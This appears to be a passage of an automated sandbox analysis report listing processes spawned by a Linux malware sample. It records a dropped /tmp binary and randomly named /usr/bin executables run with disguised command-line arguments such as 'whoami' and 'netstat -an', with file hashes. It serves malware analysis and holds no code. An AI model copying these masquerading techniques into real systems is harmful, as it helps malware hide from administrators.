                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:/usr/bin/aysistkyqn "route -n" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:/usr/bin/flwslywqdx uptime 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:/usr/bin/flwslywqdx "echo \"find\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:/usr/bin/flwslywqdx "echo \"find\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:/usr/bin/flwslywqdx bash 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:/usr/bin/flwslywqdx ls 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/flwslywqdx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:85b9832fbe6c561a27e180098bcc2d2d

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:/usr/bin/neofzderab gnome-terminal 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:/usr/bin/neofzderab "cat resolv.conf" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:/usr/bin/neofzderab "grep \"A\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:/usr/bin/neofzderab "route -n" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:/usr/bin/neofzderab uptime 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/neofzderab
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:4977aa9ca0c4cf0221d478f9c33e3603

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:/usr/bin/yxfexdyggl bash 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:/usr/bin/yxfexdyggl "ls -la" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:/usr/bin/yxfexdyggl "ps -ef" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:/usr/bin/yxfexdyggl whoami 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:/usr/bin/yxfexdyggl ls 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:36
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/yxfexdyggl
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:65d28de64b4e47691c455f46f858dde0

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:/usr/bin/taocfwkdjv sh 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:/usr/bin/taocfwkdjv "ls -la" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:/usr/bin/taocfwkdjv "netstat -antop" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:/usr/bin/taocfwkdjv whoami 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:/usr/bin/taocfwkdjv "netstat -an" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:41
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/taocfwkdjv
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b7659826f0d46cf792bcbec586317518

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:/usr/bin/vhplhrsffz "netstat -an" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:/usr/bin/vhplhrsffz id 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:/usr/bin/vhplhrsffz "ps -ef" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:/usr/bin/vhplhrsffz whoami 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:/usr/bin/vhplhrsffz "netstat -an" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vhplhrsffz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:69a4d0c17bfefe7041a1eebc0e21c128

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:/usr/bin/vdaqfdcrtx "cd /etc" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:/usr/bin/vdaqfdcrtx id 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:/usr/bin/vdaqfdcrtx top 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:/usr/bin/vdaqfdcrtx whoami 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
